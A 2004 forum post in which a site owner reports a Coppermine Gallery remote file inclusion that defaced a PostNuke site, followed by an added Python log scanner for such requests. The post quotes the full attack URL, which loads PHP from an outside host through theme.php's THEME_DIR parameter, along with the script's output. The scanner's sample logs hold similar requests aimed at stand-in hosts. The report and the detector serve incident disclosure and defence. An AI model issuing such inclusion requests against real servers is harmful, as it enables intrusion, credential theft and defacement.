PostNuke Coppermine Gallery Security Error

Started by PsyVision, October 12, 2004, 01:35:33 PM

PsyVision

hey,

I run a website, www.dustify.net. Last night someone used Coppermine to execute a PHP script to deface the front page of the website by accessing the PostNuke username/password.

"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"

is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image; it contains PHP code to break into several security flaws in several image galleries.

The result of executing the script is:

"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251

Site Ownado!"

Has anyone else had this problem?
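Added example, not part of the original post: a log check for the request pattern described above, where a query parameter such as `THEME_DIR` carries an absolute remote URL instead of a local path. The log lines, host names and the function name are constructed for illustration, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not from the post).
SAMPLE_LOG = '''\
203.0.113.7 - - [12/Oct/2004:01:10:02 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://files.example.net/x.gif?&op=coppermine HTTP/1.1" 200 5120 "-" "-"
198.51.100.4 - - [12/Oct/2004:01:11:40 +0000] "GET /modules/coppermine/index.php?cat=2&theme=default HTTP/1.1" 200 8840 "-" "-"
203.0.113.7 - - [12/Oct/2004:01:12:15 +0000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=ftp%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 4410 "-" "-"
198.51.100.9 - - [12/Oct/2004:01:13:00 +0000] "GET /redirect.php?next=/modules/coppermine/ HTTP/1.1" 302 0 "-" "-"
'''

# client, timestamp and request target from one combined-format line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"'
)
# A parameter value that starts with a remote scheme is the indicator.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_include_attempts(log_text):
    """Return (client, path, parameter, value) for each parameter whose
    decoded value is an absolute remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, _when, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME_RE.match(value):
                hits.append((client, parts.path, name, value))
    return hits


if __name__ == "__main__":
    for client, path, name, value in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{client} {path} {name}={value}")
```

Parameters that legitimately carry full URLs (redirect targets, for example) will also match, so results need review per script and parameter name.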

Tranz